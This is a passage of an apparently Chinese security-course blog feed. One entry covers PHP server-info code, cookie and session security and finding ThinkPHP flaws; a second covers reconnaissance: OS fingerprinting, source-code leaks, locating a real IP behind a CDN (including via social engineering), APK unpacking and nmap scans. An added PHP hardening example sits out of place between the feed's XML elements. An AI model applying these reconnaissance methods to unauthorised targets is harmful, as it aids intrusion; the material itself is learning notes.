italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">offline</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">))</span><span 
style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">offline</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">未知操作系统</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">return</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #89DDFF">}</span></span></code></pre></div><h4 id="获取服务器基本信息"><a href="#获取服务器基本信息" class="headerlink" title="获取服务器基本信息"></a>Get basic server information</h4><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #C792EA">public</span><span style="color: #BABED8"> </span><span style="color: #C792EA">function</span><span style="color: 
#BABED8"> </span><span style="color: #82AAFF">osinfo</span><span style="color: #89DDFF">()</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">info </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">array</span><span style="color: #89DDFF">(</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">操作系统</span><span style="color: #89DDFF">'</span><span style="color: #BABED8"></span><span style="color: #89DDFF">=></span><span style="color: #BABED8">PHP_OS</span><span style="color: #89DDFF">,</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">运行环境</span><span style="color: #89DDFF">'</span><span style="color: #BABED8"></span><span style="color: #89DDFF">=></span><span style="color: #BABED8"></span><span style="color: #89DDFF">$</span><span style="color: #BABED8">_SERVER</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">SERVER_SOFTWARE</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">],</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">主机名</span><span style="color: #89DDFF">'</span><span style="color: #BABED8"></span><span style="color: #89DDFF">=></span><span style="color: #BABED8"></span><span style="color: #89DDFF">$</span><span style="color: #BABED8">_SERVER</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">SERVER_NAME</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">],</span></span><span class="line"><span style="color: #BABED8"> </span><span 
style="color: #89DDFF">'</span><span style="color: #C3E88D">WEB服务端口</span><span style="color: #89DDFF">'</span><span style="color: #BABED8"></span><span style="color: #89DDFF">=></span><span style="color: #BABED8"></span><span style="color: #89DDFF">$</span><span style="color: #BABED8">_SERVER</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">SERVER_PORT</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">],</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">网站文档目录</span><span style="color: #89DDFF">'</span><span style="color: #BABED8"></span><span style="color: #89DDFF">=></span><span style="color: #BABED8"></span><span style="color: #89DDFF">$</span><span style="color: #BABED8">_SERVER</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">DOCUMENT_ROOT</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">],</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">浏览器信息</span><span style="color: #89DDFF">'</span><span style="color: #BABED8"></span><span style="color: #89DDFF">=></span><span style="color: #BABED8"></span><span style="color: #82AAFF">substr</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">_SERVER</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">HTTP_USER_AGENT</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">],</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">40</span><span style="color: #89DDFF">),</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: 
#89DDFF">'</span><span style="color: #C3E88D">通信协议</span><span style="color: #89DDFF">'</span><span style="color: #BABED8"></span><span style="color: #89DDFF">=></span><span style="color: #BABED8"></span><span style="color: #89DDFF">$</span><span style="color: #BABED8">_SERVER</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">SERVER_PROTOCOL</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">],</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">请求方法</span><span style="color: #89DDFF">'</span><span style="color: #BABED8"></span><span style="color: #89DDFF">=></span><span style="color: #BABED8"></span><span style="color: #89DDFF">$</span><span style="color: #BABED8">_SERVER</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">REQUEST_METHOD</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">],</span></span><span class="line"><span style="color: #89DDFF"> </span><span style="color: #676E95; font-style: italic">// 'ThinkPHP版本'=>THINK_VERSION,</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">PHP版本</span><span style="color: #89DDFF">'</span><span style="color: #BABED8"></span><span style="color: #89DDFF">=></span><span style="color: #BABED8">PHP_VERSION</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">上传附件限制</span><span style="color: #89DDFF">'</span><span style="color: #BABED8"></span><span style="color: #89DDFF">=></span><span style="color: #BABED8"></span><span style="color: #82AAFF">ini_get</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'</span><span style="color: 
#C3E88D">upload_max_filesize</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">),</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">执行时间限制</span><span style="color: #89DDFF">'</span><span style="color: #BABED8"></span><span style="color: #89DDFF">=></span><span style="color: #BABED8"></span><span style="color: #82AAFF">ini_get</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">max_execution_time</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">)</span><span style="color: #89DDFF">.'</span><span style="color: #C3E88D">秒</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">,</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">服务器时间</span><span style="color: #89DDFF">'</span><span style="color: #BABED8"></span><span style="color: #89DDFF">=></span><span style="color: #BABED8"></span><span style="color: #82AAFF">date</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">Y年n月j日 H:i:s</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">),</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">北京时间</span><span style="color: #89DDFF">'</span><span style="color: #BABED8"></span><span style="color: #89DDFF">=></span><span style="color: #BABED8"></span><span style="color: #82AAFF">gmdate</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">Y年n月j日 H:i:s</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">,</span><span style="color: #82AAFF">time</span><span style="color: #89DDFF">()+</span><span style="color: #F78C6C">8</span><span style="color: 
#89DDFF">*</span><span style="color: #F78C6C">3600</span><span style="color: #89DDFF">),</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">服务器域名/IP</span><span style="color: #89DDFF">'</span><span style="color: #BABED8"></span><span style="color: #89DDFF">=></span><span style="color: #BABED8"></span><span style="color: #89DDFF">$</span><span style="color: #BABED8">_SERVER</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">SERVER_NAME</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">]</span><span style="color: #89DDFF">.'</span><span style="color: #C3E88D"> [ </span><span style="color: #89DDFF">'.</span><span style="color: #82AAFF">gethostbyname</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">_SERVER</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">SERVER_NAME</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">])</span><span style="color: #89DDFF">.'</span><span style="color: #C3E88D"> ]</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">,</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">剩余空间</span><span style="color: #89DDFF">'</span><span style="color: #BABED8"></span><span style="color: #89DDFF">=></span><span style="color: #BABED8"></span><span style="color: #82AAFF">round</span><span style="color: #89DDFF">((</span><span style="color: #82AAFF">disk_free_space</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">.</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">)/(</span><span style="color: #F78C6C">1024</span><span style="color: #89DDFF">*</span><span style="color: #F78C6C">1024</span><span style="color: 
#89DDFF">)),</span><span style="color: #F78C6C">2</span><span style="color: #89DDFF">)</span><span style="color: #89DDFF">.'</span><span style="color: #C3E88D">M</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">,</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">当前用户的IP地址</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">=></span><span style="color: #BABED8"></span><span style="color: #89DDFF">$</span><span style="color: #BABED8">_SERVER</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">REMOTE_ADDR</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">],</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">return</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">info</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #89DDFF">}</span></span></code></pre></div><p>Everything this function returns (document root, PHP version, server software, free disk space, resolved server address) is exactly what an attacker collects during reconnaissance, so render it only on pages behind the admin login, never on a public page or an unauthenticated endpoint.</p><h3 id="登录验证"><a href="#登录验证" class="headerlink" title="登录验证"></a>Login verification</h3><ul><li>An admin backend consists of many page files; to keep the check simple, the authentication state is usually carried in a cookie or a session and verified on every page.</li><li>Cookie security: a cookie lives on the client, so its value can be modified, forged or stolen. A bare value such as <code>admin=1</code> is not proof of identity; anything kept client-side needs a server-side secret (an HMAC) so tampering can be detected.</li><li>Session security: the state is server-side, but the session id in the cookie can still be hijacked (stolen through XSS or sniffed over plain HTTP) or fixed by an attacker beforehand. Regenerate the id on login and set the HttpOnly and Secure flags on the cookie.</li><li>CAPTCHA: slows down brute-force and credential-stuffing attempts against the login form.</li></ul><h3 id="PHP框架"><a href="#PHP框架" class="headerlink" title="PHP框架"></a>PHP frameworks</h3><h4 id="thinkphp框架"><a href="#thinkphp框架" class="headerlink" title="thinkphp框架"></a>The ThinkPHP framework</h4><ul><li><p><a href="https://github.com/top-think/think/">top-think/think: ThinkPHP Framework, a high-performance PHP framework (github.com)</a></p></li><li><p><a href="https://doc.thinkphp.cn/">ThinkPHP official manual</a></p></li></ul><h4 id="漏洞存在情况"><a href="#漏洞存在情况" class="headerlink" title="漏洞存在情况"></a>Where vulnerabilities come from</h4><ul><li>Code that does not follow the framework's prescribed style (the framework's own input and query methods carry <strong>built-in filtering</strong>; reading the raw superglobals or hand-building SQL bypasses it)</li><li>A vulnerability in the framework itself</li></ul><h4 id="寻找TP框架漏洞"><a href="#寻找TP框架漏洞" class="headerlink" title="寻找TP框架漏洞"></a>Finding ThinkPHP vulnerabilities</h4><ol><li>Look at how the code is written</li><li>Look at historical vulnerabilities -> determine the version</li></ol><h5 id="获取版本信息"><a href="#获取版本信息" class="headerlink" title="获取版本信息"></a>Getting the version</h5><ul><li><p>Black box:</p><ul><li>Is it ThinkPHP at all: look at the response packet (an <code>X-Powered-By: ThinkPHP</code> header, where present)</li><li>Version: error messages (the framework's error page prints the version when debug mode is on)</li><li>URL structure (ThinkPHP's module/controller/action paths)</li></ul></li><li><p>White box: read the configuration file directly, or the <code>THINK_VERSION</code> constant in the framework source</p></li></ul>]]></content>
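The example below is added here and is not code from the original notes: it puts the weak cookie check the login-verification list warns about next to two hardened alternatives, a server-side session whose cookie carries the Secure, HttpOnly and SameSite flags and whose id is regenerated on login, and an HMAC-signed cookie for state that has to stay on the client. `APP_SECRET`, the function names and the sample payload are assumptions made for the illustration; PHP 7.3 or later is assumed for the array form of `session_set_cookie_params`.

```php
<?php
// Added example, not code from the original notes: the weak cookie check the
// list above warns about, next to two hardened alternatives.
// Assumptions: PHP >= 7.3 (array form of session_set_cookie_params); APP_SECRET
// would be loaded from configuration, never hard-coded as it is here.
declare(strict_types=1);

const APP_SECRET = 'replace-with-32-random-bytes-from-config'; // assumption

// Vulnerable pattern: the client owns the cookie jar, so "admin=1" can be
// forged in the browser's dev tools. Modification and forgery cost nothing.
function isAdminWeak(array $cookies): bool
{
    return isset($cookies['admin']) && $cookies['admin'] === '1';
}

// Hardened pattern 1: keep the login state in $_SESSION on the server and
// harden the cookie that carries the session id.
function startSecureSession(): void
{
    session_set_cookie_params([
        'lifetime' => 0,        // session cookie, gone when the browser closes
        'path'     => '/',
        'secure'   => true,     // HTTPS only: the id cannot be sniffed on plain HTTP
        'httponly' => true,     // not readable by JavaScript: limits theft via XSS
        'samesite' => 'Strict', // not attached to cross-site requests (CSRF)
    ]);
    session_start();
}

function loginUser(int $userId): void
{
    // A fresh id after authentication defeats session fixation, where the
    // attacker plants a known id before the victim logs in.
    session_regenerate_id(true);
    $_SESSION['uid']      = $userId;
    $_SESSION['login_at'] = time();
}

function isLoggedIn(): bool
{
    return isset($_SESSION['uid']);
}

// Hardened pattern 2: when state has to live in the cookie (a "remember me"
// token), sign it with an HMAC so any modification is detected.
function makeSignedCookie(array $payload, string $secret = APP_SECRET): string
{
    $data = base64_encode(json_encode($payload));
    $mac  = hash_hmac('sha256', $data, $secret);
    return $data . '.' . $mac;
}

function readSignedCookie(string $cookie, string $secret = APP_SECRET): ?array
{
    $parts = explode('.', $cookie, 2);
    if (count($parts) !== 2) {
        return null;
    }
    [$data, $mac] = $parts;
    $expected = hash_hmac('sha256', $data, $secret);
    // hash_equals compares in constant time; == or === would leak timing.
    if (!hash_equals($expected, $mac)) {
        return null;
    }
    $payload = json_decode(base64_decode($data, true) ?: '', true);
    if (!is_array($payload) || ($payload['exp'] ?? 0) < time()) {
        return null; // tampered with, or expired
    }
    return $payload;
}

// Usage, runnable from the CLI (the HMAC part needs no web server):
$cookie = makeSignedCookie(['uid' => 42, 'exp' => time() + 3600]);
var_dump(readSignedCookie($cookie)['uid']);   // int(42): intact cookie
$forged = 'A' . substr($cookie, 1);           // attacker edits one byte of the payload
var_dump(readSignedCookie($forged));          // NULL: the MAC no longer matches
```

The session functions are only called when a request is being served; in the CLI run only the signed-cookie part executes. The signed cookie still does not stop theft: a stolen token is valid until `exp`, which is why the session id cookie gets HttpOnly and Secure and why the expiry on a remember-me token should be short.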
<summary type="html"><h3 id="文件操作"><a href="#文件操作" class="headerlink" title="文件操作"></a>文件操作</h3><h4 id="文件上传"><a href="#文件上传" class="headerlink" title="文件上传"></a</summary>
<category term="网络安全" scheme="https://myprefer.github.io/tags/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/"/>
<category term="学习日志" scheme="https://myprefer.github.io/tags/%E5%AD%A6%E4%B9%A0%E6%97%A5%E5%BF%97/"/>
<category term="小迪安全" scheme="https://myprefer.github.io/tags/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A8/"/>
<category term="PHP开发" scheme="https://myprefer.github.io/tags/PHP%E5%BC%80%E5%8F%91/"/>
</entry>
<entry>
<title>Information Footprinting</title>
<link href="https://myprefer.github.io/post/%E4%BF%A1%E6%81%AF%E6%89%93%E7%82%B9.html"/>
<id>https://myprefer.github.io/post/%E4%BF%A1%E6%81%AF%E6%89%93%E7%82%B9.html</id>
<published>2024-02-26T15:22:53.000Z</published>
<updated>2024-03-26T08:26:37.620Z</updated>
<content type="html"><![CDATA[<h3 id="信息点"><a href="#信息点" class="headerlink" title="信息点"></a>信息点</h3><ul><li>基础信息</li><li>操作系统信息</li><li>应用信息</li><li>防护方法信息</li><li>人员信息</li><li>其他信息等</li></ul><h4 id="架构"><a href="#架构" class="headerlink" title="架构"></a>架构</h4><ul><li>中间件</li><li>数据库</li><li>操作系统</li><li>开发语言</li><li>CMS</li></ul><h5 id="开发语言"><a href="#开发语言" class="headerlink" title="开发语言"></a>开发语言</h5><ul><li><p>url文件后缀</p></li><li><p>查看访问数据包</p></li><li><p>搜索引擎搜索</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">site:http://xiaodi8.com index.php</span></span></code></pre></div></li><li><p>搭建组合推算<br>如: apache+php+mysql</p></li></ul><h5 id="中间件"><a href="#中间件" class="headerlink" title="中间件"></a>中间件</h5><ul><li>查看返回数据包</li><li>搭建组合推算</li><li>端口扫描</li></ul><h5 id="数据库"><a href="#数据库" class="headerlink" title="数据库"></a>数据库</h5><ul><li>端口扫描(mysql:3306)</li><li>搭建组合推算</li></ul><h5 id="操作系统"><a href="#操作系统" class="headerlink" title="操作系统"></a>操作系统</h5><ul><li><p>大小写<br>如:</p><ul><li><code>http://xiaodi8.com/index.php</code>可以访问</li><li><code>http://xiaodi8.com/indEx.php</code>无法访问<br>很有可能是Linux系统</li><li>如果对大小写不敏感, 可能是Win系统</li></ul></li><li><p>TTL值<br>默认的TTL值:</p><p>1、WINDOWS NT/2000 TTL:128<br>2、WINDOWS 95/98 TTL:32<br>3、UNIX TTL:255<br>4、LINUX TTL:64<br>5、WIN7 TTL:64</p><p>一般看哪个更接近</p></li></ul><h5 id="源码"><a href="#源码" class="headerlink" title="源码"></a>源码</h5><p><a href="https://www.secpulse.com/archives/124398.html">常见的Web源码泄漏漏洞及其利用 - SecPulse.COM | 安全脉搏</a></p><h6 id="分类"><a href="#分类" class="headerlink" title="分类:"></a>分类:</h6><ul><li>CMS开源</li><li>闭源售卖</li><li>自主研发</li></ul><h6 id="源码泄露原因"><a href="#源码泄露原因" class="headerlink" title="源码泄露原因:"></a>源码泄露原因:</h6><p>1、源码本身的特性<br>2、管理员不好的习惯<br>3、管理员不好的配置<br>4、管理员不好的意识<br>5、管理员资源信息搜集</p><h6 id="获取"><a href="#获取" 
class="headerlink" title="获取:"></a>获取:</h6><p>方式1:</p><ul><li>直接购买或下载</li></ul><p>方式2:</p><ul><li>composer.]son</li><li>git源码泄露</li><li><del>svn源码泄露</del></li><li>hg源码泄漏</li><li>网站备份压缩文件</li><li>WEB-INF/web.m1泄露(java)</li><li>DS Store文件泄露</li><li><del>SWP文件泄露</del></li><li><del>CVS泄露</del></li><li><del>Bzr泄露</del></li><li>GitHub源码泄漏</li></ul><p>方式3:</p><ul><li>黑产源码</li></ul><h4 id="WAF检测"><a href="#WAF检测" class="headerlink" title="WAF检测"></a>WAF检测</h4><ul><li><p>wafw00f</p><p><a href="https://github.com/EnableSecurity/wafw00f/tree/v2.2.0">EnableSecurity/wafw00f at v2.2.0 (github.com)</a></p></li></ul><h4 id="真实IP"><a href="#真实IP" class="headerlink" title="真实IP"></a>真实IP</h4><h6 id="判断是否有CDN"><a href="#判断是否有CDN" class="headerlink" title="判断是否有CDN"></a>判断是否有CDN</h6><ul><li><a href="https://www.17ce.com/">超级Ping</a></li></ul><h6 id="DNS绕过"><a href="#DNS绕过" class="headerlink" title="DNS绕过"></a>DNS绕过</h6><p><a href="https://zhuanlan.zhihu.com/p/33440472">绕过CDN寻找网站真实IP的方法汇总 - 知乎 (zhihu.com)</a></p><p><a href="https://www.cnblogs.com/blacksunny/p/5771827.html">绕过CDN查看网站真实IP的一些办法 - blacksunny - 博客园 (cnblogs.com)</a></p><p><a href="https://www.cnblogs.com/milantgh/p/5013254.html">查找“CDN、负载均衡、反向代理”等大型网络真实IP地址的方法 - milantgh - 博客园 (cnblogs.com)</a></p><p><a href="https://get-site-ip.com/">接口查询</a></p><p><a href="https://tools.ipip.net/cdn.php">全球 CDN 服务商查询_专业精准的IP库服务商_IPIP</a></p><ul><li><p><strong>漏洞&遗留文件</strong><br>利用SSRF漏洞让目标服务器向攻击者主动发起请求, 可以监听请求来获取目标IP</p></li><li><p><strong>子域名查询</strong><br>目标服务器的子域名可能没有配置DNS</p></li><li><p><strong>查询国外访问</strong><br>配置CDN时选择地域可能会仅设置成国内生效,此时使用国外地址访问获得真实地址</p></li><li><p><strong>邮件&备案</strong><br>密码找回发送邮件,查看邮件发送方地址找寻, 通过备案信息确认</p></li><li><p>全网扫描<strong>FuckCDN</strong></p><p><a href="https://github.com/Tai7sy/fuckcdn">Tai7sy/fuckcdn: CDN真实IP扫描,易语言开发 
(github.com)</a></p><p>扫描全球ip匹配web内容,使用工具匹配扫描网段title信息</p></li><li><p>找phpinfo()之类的<strong>探针</strong></p></li><li><p><strong>查看历史</strong></p><p>目标站点以前可能没有配置CDN</p></li><li><p>CDN本身入手</p><p>利用社工等,得到控制面板的账号密码,那真实ip就很轻易能获取到了。</p></li></ul><h6 id="找到IP后"><a href="#找到IP后" class="headerlink" title="找到IP后"></a>找到IP后</h6><ul><li>HOSTS绑定指向访问<ul><li>(win系统C:\Windows\System32\drivers\etc\hosts)将指定域名指向的ip, 本来是指向节点ip的, 可以修改为指向真实ip</li></ul></li></ul><h3 id="APP"><a href="#APP" class="headerlink" title="APP"></a>APP</h3><h4 id="资产提取"><a href="#资产提取" class="headerlink" title="资产提取"></a>资产提取</h4><h5 id="外在"><a href="#外在" class="headerlink" title="外在"></a>外在</h5><ul><li><p>抓包-Fd&茶杯&Burp</p></li><li><p>封包-封包监听工具</p><p>使用封包监听也可抓到数据包</p></li></ul><h5 id="内在"><a href="#内在" class="headerlink" title="内在"></a>内在</h5><ul><li><p>提取资源-ApplnfoScanner</p><p><a href="https://github.com/kelvinBen/AppInfoScanner">AppInfoScanner</a></p></li><li><p>反编译载入IDEA</p><ul><li><p><a href="https://github.com/Kevin2021-jk/ApkEditor/tree/main?tab=readme-ov-file#%E5%8A%9F%E8%83%BD%E4%BB%8B%E7%BB%8D">安卓修改大师</a></p></li><li><p>使用idea对反编译出的项目进行资源收集</p></li></ul></li></ul><p>资产提取后, 需进一步对代码进行分析</p><h5 id="APP-框架使用-Xposed-JustTrustMe"><a href="#APP-框架使用-Xposed-JustTrustMe" class="headerlink" title="APP-框架使用-Xposed&JustTrustMe"></a>APP-框架使用-Xposed&JustTrustMe</h5><ul><li><p>APP可能存在加壳的情况, 可通过工具判断apk是否加壳<br><a href="https://blog.csdn.net/EXIxiaozhou/article/details/127196615">Android Spider ApkScan-PKID 查壳工具下载使用以及相关技术介绍-CSDN博客</a></p></li><li><p>可通过安装xp框架的方式进行脱壳处理</p><p><a href="https://github.com/halfkiss/ZjDroid">ZjDroid</a></p><p><a href="https://blog.csdn.net/chupu2979/article/details/100616554">Android中Xposed框架篇—基于Xposed的一款脱壳神器ZjDroid工具原理解析-CSDN博客</a></p><p>frida</p></li></ul><h3 id="小程序"><a href="#小程序" class="headerlink" title="小程序"></a>小程序</h3><ul><li>登录PC端/安卓模拟器端微信, fiddler抓包</li></ul><h3 id="工具使用"><a href="#工具使用" class="headerlink" title="工具使用"></a>工具使用</h3><h4 id="网络空间搜索引擎"><a href="#网络空间搜索引擎" 
class="headerlink" title="网络空间搜索引擎"></a>网络空间搜索引擎</h4><ul><li><p>Hunt</p><ul><li><a href="https://hunter.qianxin.com/">鹰图平台 (qianxin.com)</a></li></ul></li><li><p>FOFA</p><ul><li>网址: <a href="https://fofa.info/">https://fofa.info/</a></li></ul></li><li><p>360Quake</p><ul><li><a href="https://quake.360.net/quake/#/index">360网络空间测绘 — 因为看见,所以安全</a></li></ul></li><li><p>Shodan</p><ul><li><a href="https://www.shodan.io/">Shodan Search Engine</a></li></ul></li><li><p>Zoomeye</p><ul><li><a href="https://www.zoomeye.org/"> ZoomEye(“钟馗之眼”)</a></li></ul></li></ul><p>可搜索</p><ul><li>关联资产</li><li>特征资产(中间件等)</li><li>资产信息</li></ul><h4 id="自动化工具"><a href="#自动化工具" class="headerlink" title="自动化工具"></a>自动化工具</h4><ul><li><p>Nmap</p><ul><li><p>基本操作</p><ul><li><p>基本快速扫描</p><div class="language-sh"><button title="Copy code" class="copy"></button><span class="lang">sh</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #FFCB6B">nmap</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">127.0</span><span style="color: #C3E88D">.0.1</span></span></code></pre></div><p>探测目标主机在1-10000范围内所开放的端口</p></li><li><p>扫描多个目标</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">nmap <一个ip> <另一个ip></span></span></code></pre></div></li><li><p>扫描整个网段</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">nmap 127.0.0.1/24</span></span></code></pre></div></li><li><p>扫描指定端口</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki 
material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">nmap 192.168.3.74 -p80</span></span></code></pre></div></li></ul></li><li><p>实用选项</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">-o 启用操作系统检测</span></span><span class="line"><span style="color: #babed8">--top-ports 扫描<number>最常用的端口</span></span><span class="line"><span style="color: #babed8">--proxies <url,port> 用HTTP/SOCK4代理</span></span></code></pre></div></li></ul></li><li><p>Finger-自动识别指纹<br><a href="https://github.com/EASY233/Finger?tab=readme-ov-file#%E5%BC%80%E5%A7%8B">EASY233/Finger: 一款红队在大量的资产中存活探测与重点攻击系统指纹探测工具 (github.com)</a></p></li><li><p>Kunyu:通过调用zoomeyes API实现资产信息和漏洞信息收集<br><a href="https://github.com/knownsec/Kunyu/blob/main/doc/README_CN.md">Kunyu/doc/README_CN.md at main · knownsec/Kunyu (github.com)</a></p></li><li><p>ARL灯塔:自动化信息收集工具</p><p><a href="https://github.com/TophantTechnology/ARL">TophantTechnology/ARL: ARL(Asset Reconnaissance Lighthouse)资产侦察灯塔系统旨在快速侦察与目标关联的互联网资产,构建基础资产信息库。 协助甲方安全团队或者渗透测试人员有效侦察和检索资产,发现存在的薄弱点和攻击面。 (github.com)</a></p></li><li><p>ShuiZe-水泽: 信息收集自动化工具<br><a href="https://github.com/0x727/ShuiZe_0x727">0x727/ShuiZe_0x727: 信息收集自动化工具 (github.com)</a></p><p><a href="https://blog.csdn.net/baidu_26383841/article/details/132269515">水泽的安装和使用(信息收集自动化工具)_水泽安装-CSDN博客</a></p></li></ul><p><img src="https://i0.imgs.ovh/2024/02/27/uUIGs.png" alt="uUIGs.png"></p>]]></content>
<summary type="html"><h3 id="信息点"><a href="#信息点" class="headerlink" title="信息点"></a>信息点</h3><ul>
<li>基础信息</li>
<li>操作系统信息</li>
<li>应用信息</li>
<li>防护方法信息</li>
<li></summary>
<category term="网络安全" scheme="https://myprefer.github.io/tags/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/"/>
<category term="学习日志" scheme="https://myprefer.github.io/tags/%E5%AD%A6%E4%B9%A0%E6%97%A5%E5%BF%97/"/>
<category term="小迪安全" scheme="https://myprefer.github.io/tags/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A8/"/>
<category term="信息收集" scheme="https://myprefer.github.io/tags/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/"/>
</entry>
